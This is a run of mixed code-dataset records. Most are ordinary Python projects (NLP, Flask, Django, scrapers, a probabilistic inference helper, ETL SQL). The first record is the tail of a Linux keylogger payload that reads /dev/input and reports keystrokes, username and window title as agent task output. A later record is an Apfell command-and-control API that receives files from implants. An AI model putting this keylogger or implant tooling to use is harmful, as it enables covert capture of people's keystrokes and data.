print(find_event())\n infile_path = \"/dev/input/\" + find_event().strip()\n\n FORMAT = 'llHHI'\n EVENT_SIZE = struct.calcsize(FORMAT)\n\n in_file = open(infile_path, \"rb\")\n\n event = in_file.read(EVENT_SIZE)\n\n line = \"\"\n\n while event:\n\n if break_function:\n print(\"break detected, stopping keylog\")\n response = {\n \"task_id\": task_id,\n \"user\": getpass.getuser(), \n \"window_title\": get_active_window_title(), \n \"keystrokes\": line,\n \"completed\": True\n }\n responses.append(response)\n break_function = False\n return\n\n (_, _, type, code, value) = struct.unpack(FORMAT, event)\n\n if code != 0 and type == 1 and value == 1:\n\n if code == 28 or code == 96:\n response = {\n \"task_id\": task_id,\n \"user\": getpass.getuser(), \n \"window_title\": get_active_window_title(), \n \"keystrokes\": line + \"\\n\",\n }\n responses.append(response)\n line = \"\"\n else: \n line += qwerty_map[code]\n\n event = in_file.read(EVENT_SIZE)","sub_path":"Payload_Types/kayn/agent_code/keylog_no_X.py","file_name":"keylog_no_X.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"116570571","text":"#!/usr/bin/env python#\n# -*- coding: utf-8 -*-\n \nfrom dependency_parsing import DependencyParsing\n\ndef main():\n dp = DependencyParsing(\"neko.xml\")\n s = dp.sentences[4]\n print(s)\n for c in s.chunks:\n verb = False\n for m in c.morphs:\n if m.pos == '動詞':\n verb = True\n print(m.base + '\\t', end='')\n break\n list = []\n if verb:\n for nc in c.srcs:\n for m in s.chunks[nc].morphs:\n if m.pos == '助詞':\n list.append(s.chunks[nc])\n print(m.surface, end=' ')\n print('\\t', end='')\n for c in list:\n print(c, end=' ')\n print()\n \nif __name__ == '__main__':\n main()\n","sub_path":"46.py","file_name":"46.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"450967132","text":"from robots.state import saveContent\n\n\ndef user():\n\n def askAndReturnSearchTerm():\n return str(input('Type a Wikipedia search term: ')).title()\n\n def redLine(lista, text):\n for i in range(len(lista)):\n print('[', i, ']', lista[i])\n return int(input(text))\n\n def askAndReturnPrefix(language):\n if(language == 'en'):\n prefixes = ['Who is', 'What is', 'The history of']\n else:\n prefixes = ['Quem é', 'Oque é', 'A história de']\n prefix = redLine(prefixes, 'Choose a option: ')\n return prefixes[prefix]\n\n def askAndReturnTemplate():\n prefixes = ['Know the world ', 'Senta que la vem historia - newsroom',\n 'Senta que la vem historia - music epic',\n 'Senta que la vem historia - music evolution',\n 'Senta que la vem historia - music Missing My Girl']\n prefix = redLine(prefixes, 'Choose a Template option: ')\n return prefix+1\n\n def askAndReturnLanguage():\n prefixes = ['English', 'Portuguese']\n language = ['en', 'pt']\n prefix = redLine(prefixes, 'Choose a Language option: ')\n return language[prefix]\n\n language = askAndReturnLanguage()\n\n content = {\n # 'language': 'en',\n 'language': language,\n 'searchTerm': askAndReturnSearchTerm(),\n # 'prefix': 'What is ',\n 'prefix': askAndReturnPrefix(language),\n 'maximumSentences': 7,\n 'template': 1\n # 'template': askAndReturnTemplate()\n }\n saveContent(content)\n","sub_path":"robots/userInput.py","file_name":"userInput.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"134568122","text":"import bs4 as bs\nimport urllib.request \nimport requests\nimport re\nimport os\nfrom urllib.parse import urljoin\n\ndef get_pdfs():\n\turl_get = 'https://www.supremecourt.gov/oral_arguments/argument_transcript/2008'\n\tsauce = urllib.request.urlopen(str(url_get)).read()\n\tsoup = bs.BeautifulSoup(sauce, 'lxml')\n\n\tpdf_link = soup.find_all('span', style='display:block;width:80px;float:left;')\n\tpdf_urljoins = []\n\tfor link in pdf_link:\n\t \tpdf_urljoin = re.findall(r'\\bargument_transcripts[/]\\d{4}[/]\\d{0,10}\\W\\w*[.]\\bpdf', str(link))\n\t \tpdf_urljoins.append(pdf_urljoin)\n\tprint(len(pdf_urljoins))\n\t\n\tpdf_names = []\n\tfor link in pdf_link:\n\t \tpdf_name = re.findall(r'\\d{1,2}[-]\\d{1,10}[.]\\bpdf', str(link))\n\t \tpdf_names.append(pdf_name)\n\n\t# flattens pdf_urljoins list \n\tflat_pdf_urljoins = [item for url in pdf_urljoins for item in url]\n\n\t# flattens pdf_names list \n\tflat_pdf_names = [item for url in pdf_names for item in url]\n\t\n\t# provides the base for the URLs in urljoin\n\tbase = re.findall(r'\\bhttps://www[.]\\bsupremecourt[.]\\bgov/oral_arguments/', url_get)\n\t\n\tlinks = []\n\tfor url in flat_pdf_urljoins:\n\t\tx = urljoin(str(base[0]), str(url))\n\t\tlinks.append(x)\n\n\tcounter = 0\n\tfor link in links:\n\t\tr = requests.get(link, allow_redirects=False)\n\t\topen(str(link[70:]), 'wb').write(r.content)\n\t\tcounter += 1\n\t\tprint(counter, link)\n\t\nget_pdfs()","sub_path":"Capstone 2/PDF Parsing Scripts/pdf_downloader_1.py","file_name":"pdf_downloader_1.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"519877591","text":"#!/usr/bin/python3\n\"\"\"\nRoutes:\n /states: HTML page with a list of all State objects.\n /states/: HTML page displaying the given state with .\n\"\"\"\nfrom models import storage\nfrom flask import Flask\nfrom flask import render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/states\", strict_slashes=False)\ndef states():\n \"\"\"\n Displays a HTML page with a list of all states\n \"\"\"\n states = storage.all(\"State\")\n return render_template(\"9-states.html\", state=states)\n\n\n@app.route(\"/states/\", strict_slashes=False)\ndef states_by_id(id):\n \"\"\"\n Displays a HTML page with state that matches id if exists\n \"\"\"\n for state in storage.all(\"State\").values():\n if state.id == id:\n return render_template(\"9-states.html\", state=state)\n return render_template(\"9-states.html\")\n\n\n@app.teardown_appcontext\ndef teardown(exc):\n \"\"\"\n Remove current SQLAlchemy session\n \"\"\"\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"498534330","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import ListView, UpdateView, CreateView\nfrom django.views.generic.detail import SingleObjectMixin\n\nfrom Nomencladores.forms import CarreraForm\nfrom Nomencladores.models import Carrera\n\n\nclass ListadoCarreras(ListView):\n model = Carrera\n template_name = 'Carreras/listado_carreras.html'\n paginate_by = 10\n\n def get_queryset(self):\n carreras = Carrera.objects.all().order_by('nombre')\n\n q = self.request.GET.get('q')\n if q is not None:\n carreras = carreras.filter(Q(nombre__icontains=q) |\n Q(tipo__icontains=q)\n )\n return carreras\n\n def get_context_data(self, **kwargs):\n context = super(ListadoCarreras, self).get_context_data(**kwargs)\n context['titulo'] = 'Carreras'\n context['subtitulo'] = 'listado'\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'Carreras', 'href': reverse_lazy('listado_carreras')}\n\n ]\n\n resultado = \"\"\n if self.get_queryset().count() == 0:\n resultado = \"No existen elementos para desplegar.\"\n context['resultado'] = resultado\n\n return context\n\n\nclass RegistrarCarreraView(SuccessMessageMixin, CreateView):\n model = Carrera\n template_name = \"Carreras/carrera_form.html\"\n form_class = CarreraForm\n success_url = reverse_lazy('listado_carreras')\n\n def get_context_data(self, **kwargs):\n context = super(RegistrarCarreraView, self).get_context_data(**kwargs)\n context['titulo'] = \"Registrar\"\n context['subtitulo'] = \"carrera\"\n context['form'] = self.form_class\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'Carreras', 'href': reverse_lazy('listado_carreras')},\n {'name': 'Registrar carrera', 'href': reverse_lazy('registrar_carrera')}\n ]\n return context\n\n def form_valid(self, form):\n form.save()\n messages.add_message(self.request, messages.SUCCESS, \"Carrera agregada con éxito.\")\n return super(RegistrarCarreraView, self).form_valid(form)\n\n def form_invalid(self, form):\n context = {\n 'titulo': \"Registrar\",\n 'subtitulo': \"candidato\",\n 'form': form,\n 'path': [\n {'name': 'Bolsa', 'href': reverse_lazy('listado_bolsa')},\n {'name': 'Registrar', 'href': reverse_lazy('registrar_candidato')}\n ]\n }\n return render(self.request, self.template_name, context)\n\n\nclass ModificarCarreraView(UpdateView):\n model = Carrera\n template_name = \"Carreras/carrera_form.html\"\n form_class = CarreraForm\n success_url = reverse_lazy('listado_carreras')\n\n def get_context_data(self, **kwargs):\n context = super(ModificarCarreraView, self).get_context_data(**kwargs)\n obj = Carrera.objects.get(pk=self.kwargs['pk'])\n context['titulo'] = \"Modificar\"\n context['subtitulo'] = \"carrera\"\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'Carreras', 'href': reverse_lazy('listado_carreras')},\n {'name': 'Modificar', 'href': reverse_lazy('modificar_carrera', kwargs={'pk': obj.pk})},\n ]\n return context\n\n def form_valid(self, form):\n form.save()\n messages.add_message(self.request, messages.SUCCESS, \"Carrera modificada con éxito.\")\n return super(ModificarCarreraView, self).form_valid(form)\n\n\nclass EliminarCarreraView(SingleObjectMixin, View):\n\n def get(self, request, *args, **kwargs):\n carrera = Carrera.objects.get(id=self.kwargs['pk'])\n carrera.delete()\n messages.add_message(request, messages.SUCCESS, \"Eliminada con éxito.\")\n return redirect('/carreras/')\n\n\nclass ActivarCarreraView(SingleObjectMixin, View):\n\n def get(self, request, *args, **kwargs):\n carrera = Carrera.objects.get(id=self.kwargs['pk'])\n carrera.activo = True\n carrera.save()\n messages.add_message(request, messages.SUCCESS, \"Habilitada con éxito.\")\n return redirect('/carreras/')\n\n\nclass DesactivarCarreraView(SingleObjectMixin, View):\n\n def get(self, request, *args, **kwargs):\n carrera = Carrera.objects.get(id=self.kwargs['pk'])\n carrera.activo = False\n carrera.save()\n messages.add_message(request, messages.SUCCESS, \"Deshabilitada con éxito.\")\n return redirect('/carreras/')\n","sub_path":"Nomencladores/views/views_carreras.py","file_name":"views_carreras.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"633370674","text":"from bs4 import BeautifulSoup\nimport requests\nimport regex\nimport unicodedata\nimport sys\n\nimport urllib\n\ndef __main__():\n year = sys.argv[1];\n semester = sys.argv[2];\n\n schedulePull = semester + str(year) + \"/schedule.html\"\n\n data = requests.get(\"https://courses.k-state.edu/\" + schedulePull)\n\n scheduleURLS = data.text\n\n soup = BeautifulSoup(scheduleURLS, \"html.parser\")\n\n urlList = []\n for link in soup.find_all('a'):\n if( len(str(link.get(\"href\"))) < 7 and (str(link.get(\"href\")) != \"/\" and str(link.get(\"href\")) != \"None\") ):\n urlList.append(str(link.get(\"href\")))\n print(\"https://courses.ksu.edu/\" + semester + str(year) + \"/\" + str(link.get(\"href\")))\n sys.stdout.flush()\n\t\t\t\n__main__()","sub_path":"Windows/get_urls.py","file_name":"get_urls.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94442644","text":"import sys\r\n\r\nimport numpy\r\nfrom numpy import log10\r\nfrom numpy import logaddexp\r\nfrom numpy import log\r\nfrom scipy.special import logsumexp as logsum1\r\nnumpy.seterr(all='ignore')\r\n\r\n\r\ndef logsumexp(a):\r\n \"\"\"\r\n Uses the log sum exp technique to do computation in higher domain than float\r\n @param a: The array for which we want to find the sum\r\n @return: The sum of the array founded by log sum exp technique\r\n \"\"\"\r\n #return logsum1(a)/log(10)\r\n mx = max(a)\r\n to_return = log10(numpy.sum([threshold(10 ** (i - mx)) for i in a])) + mx\r\n return to_return\r\n\r\n\r\ndef threshold(x):\r\n \"\"\"\r\n This function is used to find the value in the given limit\r\n @param x: The value which needs to be checked\r\n @return: the value according to the threshold\r\n \"\"\"\r\n if x == float('inf'):\r\n return sys.float_info.max\r\n return x\r\n\r\n\r\ndef get_index_given_truth_values(variables, truth_values, cardinalities):\r\n \"\"\"\r\n The function converts truth table tuples to array indices\r\n :param variables: The variable in factor\r\n :param truth_values: The values of given variables in the truth table (same order as variable)\r\n :param cardinalities: The cardinality of the given variables (same order as variable)\r\n :return:The index for the array\r\n \"\"\"\r\n index = 0\r\n number = 0\r\n while number < len(variables):\r\n number_of_tuples_for_current_var = numpy.prod(cardinalities[number + 1:]) * truth_values[number]\r\n index = index + number_of_tuples_for_current_var\r\n number += 1\r\n return int(index)\r\n\r\n\r\ndef get_truth_values_given_index(variables, index_value, cardinalities):\r\n \"\"\"\r\n Gives the truth value (values in tuple) for given index of the array\r\n @param variables: list containing all the variables in the graph which are in the factor\r\n @param index_value: Index value for which the tuple is to be founded\r\n @param cardinalities: Cardinalities of the given variables\r\n @return: the tuple for corresponding index value\r\n \"\"\"\r\n number = 0\r\n truth_table_value = []\r\n while number < len(variables):\r\n truth_table_value.append(int(index_value // numpy.prod(cardinalities[number + 1:])))\r\n index_value = index_value - (index_value // numpy.prod(cardinalities[number + 1:])) * numpy.prod(\r\n cardinalities[number + 1:])\r\n number += 1\r\n return truth_table_value\r\n\r\n\r\ndef convert_to_log_space(distribution_array):\r\n \"\"\"\r\n This function is used to convert the given array into log space\r\n @param distribution_array: Given distribution array\r\n @return: The distribution array in log space\r\n \"\"\"\r\n new_distribution_array = []\r\n for each in distribution_array:\r\n new_distribution_array.append(list(numpy.log10(each)))\r\n return new_distribution_array\r\n\r\n\r\ndef convert_to_exponent_space(distribution_array):\r\n \"\"\"\r\n This function is used to convert the given array into exponent space\r\n @param distribution_array: Given distribution array\r\n @return: The distribution array in exponent space\r\n \"\"\"\r\n new_distribution_array = []\r\n for each in distribution_array:\r\n if each is not list:\r\n each_new = threshold(10 ** each)\r\n else:\r\n each_new = []\r\n for each_value in each:\r\n each_new.append(threshold(10 ** each))\r\n new_distribution_array.append(each_new)\r\n return new_distribution_array\r\n\r\n\r\ndef compute_ordering(num_of_var, var_in_clique, evidence):\r\n \"\"\"\r\n\r\n @param num_of_var: Number of variable for which the ordering is needed\r\n @param var_in_clique: the number of variables in each clique\r\n @param evidence: The evidence provided\r\n @return: variables according to their degree for elimination\r\n \"\"\"\r\n min_degree_for_each_var = [0] * num_of_var\r\n evidence_var = [x[0] for x in evidence]\r\n for each in var_in_clique:\r\n each_without_evidence = each\r\n for each_var in each_without_evidence:\r\n min_degree_for_each_var[each_var] += len(each_without_evidence) - 1\r\n sorted_variable = numpy.argsort(min_degree_for_each_var)\r\n each = 0\r\n \"\"\"\r\n while each < (len(sorted_variable)):\r\n if sorted_variable[each] in evidence_var:\r\n sorted_variable = numpy.delete(sorted_variable, each)\r\n min_degree_for_each_var.remove(min_degree_for_each_var[each])\r\n each = each - 1\r\n each = each + 1\r\n \"\"\"\r\n return min_degree_for_each_var, sorted_variable\r\n\r\n\r\ndef instantiate(num_of_var, evidence, cardinalities, var_in_clique, distribution_array):\r\n \"\"\"\r\n Used to instantiate the factors given the evidence\r\n @param num_of_var: The number of variables in the graph\r\n @param evidence: The given evidence\r\n @param cardinalities: THe cardinalities of the variables\r\n @param var_in_clique: Variables in the clique\r\n @param distribution_array: The probability distribution array\r\n @return: The instantiated probability distribution table and updated variable list\r\n \"\"\"\r\n for each in evidence:\r\n variable = each[0]\r\n value = each[1]\r\n var_in_clique = numpy.array(var_in_clique)\r\n cardinalities = numpy.array(cardinalities)\r\n for each_clique in range(len(var_in_clique)):\r\n if variable in var_in_clique[each_clique]:\r\n for each_tuple in range(len(distribution_array[each_clique])):\r\n # Truth value is calculated for each tuple and then compared if it is equal to the evidence variable\r\n truth_value = get_truth_values_given_index(var_in_clique[each_clique], each_tuple,\r\n cardinalities[var_in_clique[each_clique]])\r\n if truth_value[(list(var_in_clique[each_clique])).index(variable)] != value:\r\n index_to_delete = get_index_given_truth_values(var_in_clique[each_clique], truth_value,\r\n cardinalities[var_in_clique[each_clique]])\r\n # It the tuple does not match with the evidence then we ignore it\r\n distribution_array[each_clique][index_to_delete] = \"-1\"\r\n var_in_clique = list(var_in_clique)\r\n val = list(var_in_clique[each_clique]).index(variable)\r\n # deleting the evidence variable from the array\r\n var_in_clique[each_clique] = numpy.ndarray.tolist(numpy.delete(var_in_clique[each_clique], val))\r\n # removing the values that does not correspond with the evidence\r\n distribution_array[each_clique] = list(filter(lambda a: a != \"-1\", distribution_array[each_clique]))\r\n return var_in_clique, distribution_array\r\n\r\n\r\ndef product_of_factors(factor_1, factor_2, var_in_factor_1, var_in_factor_2, cardinalities):\r\n \"\"\"\r\n Takes two factors and returns the product of those two\r\n @param factor_1: The first factor\r\n @param factor_2: The second factor\r\n @param var_in_factor_1: tThe variables in factor 1\r\n @param var_in_factor_2: The variables in factor 2\r\n @param cardinalities: The cardinalities of the variables in facotrs\r\n @return: The product of the given two factors\r\n \"\"\"\r\n var_in_output = []\r\n for each_var in var_in_factor_1:\r\n var_in_output.append(each_var)\r\n for each_var in var_in_factor_2:\r\n if each_var not in var_in_output:\r\n var_in_output.append(each_var)\r\n common_var = list(set(var_in_factor_1).intersection(set(var_in_factor_2)))\r\n new_factor = []\r\n cardinalities = numpy.array(cardinalities)\r\n for each_index_value_of_factor_1 in range(numpy.product(cardinalities[var_in_factor_1])):\r\n # Get the truth values for both the tuples\r\n truth_value_1 = numpy.array(\r\n get_truth_values_given_index(var_in_factor_1, each_index_value_of_factor_1, cardinalities[var_in_factor_1]))\r\n for each_index_value_of_factor_2 in range(numpy.product(cardinalities[var_in_factor_2])):\r\n truth_value_2 = numpy.array(get_truth_values_given_index(var_in_factor_2, each_index_value_of_factor_2,\r\n cardinalities[var_in_factor_2]))\r\n # Check if both the tuples are compatible or not, if yes then take their product\r\n if (truth_value_1[numpy.where(numpy.isin(var_in_factor_1, common_var))] == truth_value_2[\r\n numpy.where(numpy.isin(var_in_factor_2, common_var))]).all():\r\n new_factor.append(\r\n threshold(factor_1[each_index_value_of_factor_1] + factor_2[each_index_value_of_factor_2]))\r\n return new_factor, var_in_output\r\n\r\n\r\ndef sum_out(factor, set_of_variable_to_sum_out, var_in_factor, cardinalities):\r\n \"\"\"\r\n Takes a factor and a variable to sum and returns a factor with other variables\r\n @param factor: The factor in which the sum will take place\r\n @param set_of_variable_to_sum_out: THe set of variables for which sum needs to be done\r\n @param var_in_factor: The variables in the factor/clique\r\n @param cardinalities: The cardinalities of the variables in the factor\r\n @return:\r\n \"\"\"\r\n cardinalities = numpy.array(cardinalities)\r\n set_of_variable_to_sum_out = [set_of_variable_to_sum_out]\r\n var_in_final_factor = list(filter(lambda x: x not in set_of_variable_to_sum_out, var_in_factor))\r\n # Getting the size of new factor\r\n num_tuple_new_factor = numpy.product(numpy.array(cardinalities)[var_in_final_factor])\r\n new_factor = [[]] * num_tuple_new_factor\r\n for each_tuple in range(len(factor)):\r\n truth_value = numpy.array(\r\n get_truth_values_given_index(var_in_factor, each_tuple, cardinalities[var_in_factor]))\r\n index_for_new_factor = get_index_given_truth_values(var_in_final_factor, truth_value[\r\n numpy.where(numpy.isin(var_in_factor, var_in_final_factor))], cardinalities[var_in_final_factor])\r\n # Adding value compatible with the variable\r\n new_factor[index_for_new_factor] = new_factor[index_for_new_factor] + [factor[each_tuple]]\r\n new_factor = [threshold(logsumexp(i)) for i in new_factor]\r\n return new_factor, var_in_final_factor\r\n","sub_path":"Sampling-based-Variable-Elimination-and-Conditioning/Sampling-based-Variable-Elimination-and-Conditioning-master/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":10282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"228486006","text":"from app import apfell, db_objects\nfrom app.database_models.model import FileMeta, FileData, Task\nfrom sanic.response import json, html\nimport base64\nfrom sanic_jwt.decorators import protected, inject_user\n\n\n@apfell.route(apfell.config['API_BASE'] + \"/files\", methods=['GET'])\n@inject_user()\n@protected()\nasync def get_all_files_meta(request, user):\n try:\n files = await db_objects.execute(FileMeta.select())\n except Exception as e:\n return json({'status': 'error', 'error': 'failed to get files'})\n return json([f.to_json() for f in files])\n\n\n@apfell.route(apfell.config['API_BASE'] + \"/files/\", methods=['GET'])\nasync def get_file_from_database(request, id):\n try:\n file_meta = await db_objects.get(FileMeta, id=id)\n except Exception as e:\n print(e)\n return json({}, status=404)\n # now that we have the file metadata, get all the pieces to send back\n try:\n file_pieces = await db_objects.execute(FileData.select().where(FileData.meta_data == file_meta).order_by(FileData.chunk_num))\n data = bytearray()\n for piece in file_pieces:\n data += piece.chunk_data.tobytes()\n encdata = base64.b64encode(data).decode(\"utf-8\")\n return html(encdata)\n except Exception as e:\n print(e)\n return json({}, status=500)\n\n\n@apfell.route(apfell.config['API_BASE'] + \"/files//\", methods=['GET'])\nasync def get_chunk_from_database(request, id, chunk):\n # get a chunk of a file from the database\n try:\n file_meta = await db_objects.get(FileMeta, id=id)\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': 'failed to get file object'})\n try:\n file_chunk = await db_objects.get(FileData, meta_data=file_meta, chunk_num=chunk)\n return json(file_chunk.to_json())\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': 'failed to get chunk'})\n\n\n# when an implant gets the task to download a file, first reaches out here\n@apfell.route(apfell.config['API_BASE'] + \"/files/\", methods=['POST'])\nasync def create_filemeta_in_database(request):\n return await create_filemeta_in_database_func(request.json)\n\n\nasync def create_filemeta_in_database_func(data):\n # create a filemeta object where we will then start uploading our file\n # expects total_chunks, and task\n if 'total_chunks' not in data:\n return json({'status': 'error', 'error': 'total_chunks required'})\n if 'task' not in data:\n return json({'status': 'error', 'error': 'corresponding task id required'})\n try:\n task = await db_objects.get(Task, id=data['task'])\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': \"failed to find task\"})\n try:\n filemeta = await db_objects.create(FileMeta, total_chunks=data['total_chunks'], task=task)\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': \"failed to create file\"})\n status = {'status': 'success'}\n return json({**status, **filemeta.to_json()})\n\n\n# after calling the above path, the implant calls this to upload the content\n@apfell.route(apfell.config['API_BASE'] + \"/files/\", methods=['POST'])\nasync def download_file_to_database(request, id):\n return await download_file_to_database_func({**request.json, \"file_id\": id})\n\n\nasync def download_file_to_database_func(data):\n # upload content blobs to be associated with filemeta id\n if 'chunk_num' not in data:\n return json({'status': 'error', 'error': 'missing chunk_num'})\n if 'chunk_data' not in data:\n return json({'status': 'error', 'error': 'missing chunk data'})\n try:\n file_meta = await db_objects.get(FileMeta, id=data['file_id'])\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': 'failed to get File info'})\n try:\n chunk_data = base64.b64decode(data['chunk_data'])\n piece = await db_objects.create(FileData, chunk_num=data['chunk_num'],\n chunk_data=chunk_data, meta_data=file_meta)\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': 'failed to store chunk'})\n return json({'status': 'success'})","sub_path":"app/api/file_api.py","file_name":"file_api.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"252525839","text":"primos = []\nl, u = input(\"\").split()\nl = int(l)\nu = int(u)\n\ndivisores =[]\nfor i in range(l, u+1): \n for j in range(1, i+1):\n if i >= j:\n if i % j == 0:\n divisores.append(j) \n if len(divisores) == 2:\n primos.append(i)\n divisores = []\n\nv = []\n\nfor i in range(1, len(primos)):\n v.append(primos[i] - primos[i-1])\n\nm = 0\nc = 0\n\n\nif len(v) == 0:\n print(\"-1\", \"\\n\")\n\nelif len(primos) > 0:\n resul = primos[0]\n for i in v:\n for j in v:\n if i == j:\n c += 1\n if c > m:\n m = c\n resul = i\n c = 0\n\n print(resul, \"\\n\")\n","sub_path":"Estruturas de Repetição e Dados/Lista 1 - Saltando Primos.py","file_name":"Lista 1 - Saltando Primos.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"431867215","text":"\n\n#calss header\nclass _UPBRAID():\n\tdef __init__(self,): \n\t\tself.name = \"UPBRAID\"\n\t\tself.definitions = [u'to forcefully or angrily tell someone they should not have done a particular thing and criticize them for having done it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_upbraid.py","file_name":"_upbraid.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184537873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 27 22:08:03 2019\n\n@author: IMRANAX\n\"\"\"\n\nimport pandas as pd\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef plotIrisData(X):\n\n # plot data\n plt.scatter(X[:50, 0], X[:50, 1],\n color='red', marker='o', label='setosa')\n plt.scatter(X[50:100, 0], X[50:100, 1],\n color='blue', marker='x', label='versicolor')\n \n plt.xlabel('sepal length [cm]')\n plt.ylabel('petal length [cm]')\n plt.legend(loc='upper left')\n \n # plt.savefig('images/02_06.png', dpi=300)\n plt.show()","sub_path":"sl/adaline/plotIris.py","file_name":"plotIris.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"258996036","text":"import json\nfrom urllib.request import urlopen\n\nfrom asreview.datasets import BaseDataSet, BaseVersionedDataSet\nfrom asreview.datasets import BaseDataGroup, dataset_from_url\n\n\nclass Covid19DataGroup(BaseDataGroup):\n group_id = \"covid19\"\n description = \"A Free dataset on publications on the corona virus.\"\n\n def __init__(self):\n base_url = \"https://raw.githubusercontent.com/asreview/asreview-covid19/master/config\"\n base_index = base_url + \"/index.json\"\n datasets = []\n with urlopen(base_index) as f:\n dir_list = json.loads(f.read().decode())\n for dir_ in dir_list:\n url = base_url + \"/\" + dir_\n datasets.append(dataset_from_url(url))\n super(Covid19DataGroup, self).__init__(\n *datasets\n )\n","sub_path":"asreviewcontrib/covid19/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239242503","text":"'''\nCreated on 2015年12月22日\n\n历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)\n\n@author: lijian\n'''\n\nimport datetime\n\nfrom settings import logger\nfrom common.pgcomm import PGUtils\nfrom common.sqlcomm import formatSql\nfrom common.log_db import insertlog\nfrom common.sysutils import truncateTbls\nfrom common.syscomm import SYS_LOG_TYPE_REPORT,SYS_LOG_RESULT_OK\n\ntblnames = ['edw.rpt_custnum_subbranch_year']\n\nsql_insert = '''\nINSERT into edw.rpt_custnum_subbranch_year(year_id,subbranch_id,custnum_1,custnum_0,custnum_all,custnum_1_rate,custnum_0_rate)\nselect T.year_id,T.subbranch_id,sum(a) as custnum_1,sum(b) as custnum_0,sum(a)+sum(b) as custnum_all,round(sum(a)*100.0/(sum(a)+sum(b)),2) as custnum_1_rate, round(sum(b)*100.0/(sum(a)+sum(b)),2) as custnum_0_rate from\n(select count(*) as a,0 as b,year_id,subbranch_id from edw.cust_point_assets_yearend \ngroup by subbranch_id,year_id\nunion all \nselect 0 as a,count(*) as b ,year_id,subbranch_id from edw.assets_zero_detail_yearend \ngroup by subbranch_id,year_id) as T\ngroup by T.subbranch_id,T.year_id\norder by T.year_id,T.subbranch_id\n'''\n \ndef insert_data(conn):\n '''\n 插入数据\n '''\n d0 = datetime.datetime.now()\n with conn.cursor() as cur:\n logger.debug(formatSql(sql_insert))\n cur.execute(formatSql(sql_insert))\n d1 = datetime.datetime.now()\n logger.info(\"插入数据 完成. 耗时: %s 秒. \" % (d1-d0).seconds)\n\ndef deal(sys_date, batch_id, data_date):\n '''\n 历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)\n '''\n d0 = datetime.datetime.now()\n logger.info(\"start... 历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)\")\n pgUtils = PGUtils()\n\n conn = pgUtils.getConnection()\n try:\n with conn:\n # 清空数据\n truncateTbls(conn, tblnames)\n \n # 插入数据\n insert_data(conn)\n \n d1 = datetime.datetime.now()\n log_content = \"历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)处理完成.\"\n insertlog(conn, sys_date, batch_id, SYS_LOG_TYPE_REPORT, SYS_LOG_RESULT_OK, log_content, d0, d1, (d1-d0).seconds)\n logger.info(\"end... 历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)处理完成. 耗时: %s 秒. \" % (d1-d0).seconds)\n finally:\n conn.close()\n return True","sub_path":"etl/datadeal/scripts/rptyear/rpt_custnum_subbranch_year.py","file_name":"rpt_custnum_subbranch_year.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"326018017","text":"# File: main.py\n# Author: Jeff Flanegan\n# Date: 